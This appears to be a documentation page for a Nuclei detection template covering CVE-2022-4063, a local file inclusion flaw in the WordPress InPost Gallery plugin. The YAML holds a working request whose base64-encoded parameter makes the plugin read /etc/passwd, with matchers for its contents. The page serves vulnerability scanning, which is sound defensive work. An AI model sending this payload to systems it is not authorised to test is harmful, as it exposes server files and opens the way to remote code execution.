WordPress InPost Gallery <2.1.4.1 - Local File Inclusion
ID: CVE-2022-4063
Severity: critical
Author: theamanrawat
Tags: cve2022,cve,wp-plugin,wp,inpost-gallery,lfi,wordpress,unauth,wpscan,pluginus
Description
Section titled “Description”WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP’s extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers.
YAML Source
Section titled “YAML Source”id: CVE-2022-4063
info: name: WordPress InPost Gallery <2.1.4.1 - Local File Inclusion author: theamanrawat severity: critical description: | WordPress InPost Gallery plugin before 2.1.4.1 is susceptible to local file inclusion. The plugin insecurely uses PHP's extract() function when rendering HTML views, which can allow attackers to force inclusion of malicious files and URLs. This, in turn, can enable them to execute code remotely on servers. impact: | The vulnerability allows an attacker to read arbitrary files on the server, potentially exposing sensitive information or executing malicious code. remediation: Fixed in version 2.1.4.1. reference: - https://wpscan.com/vulnerability/6bb07ec1-f1aa-4f4b-9717-c92f651a90a7 - https://wordpress.org/plugins/inpost-gallery/ - https://nvd.nist.gov/vuln/detail/CVE-2022-4063 - https://github.com/cyllective/CVEs - https://github.com/im-hanzou/INPGer classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4063 cwe-id: CWE-22 epss-score: 0.08321 epss-percentile: 0.9437 cpe: cpe:2.3:a:pluginus:inpost_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: pluginus product: inpost_gallery framework: wordpress tags: cve2022,cve,wp-plugin,wp,inpost-gallery,lfi,wordpress,unauth,wpscan,pluginus
http: - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=inpost_gallery_get_gallery&popup_shortcode_key=inpost_fancy&popup_shortcode_attributes=eyJwYWdlcGF0aCI6ICJmaWxlOi8vL2V0Yy9wYXNzd2QifQ=="
matchers-condition: and matchers: - type: word part: header words: - "text/html"
- type: regex part: body regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4b0a00483046022100afde459b35ebe36a79997d90a6aa08090f0a25436e88b021354343d7b6cb6889022100e1b0578e5322bd6be18f9619c3e7b2bd1b58767870898991307970e98549d9e8:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-4063.yaml"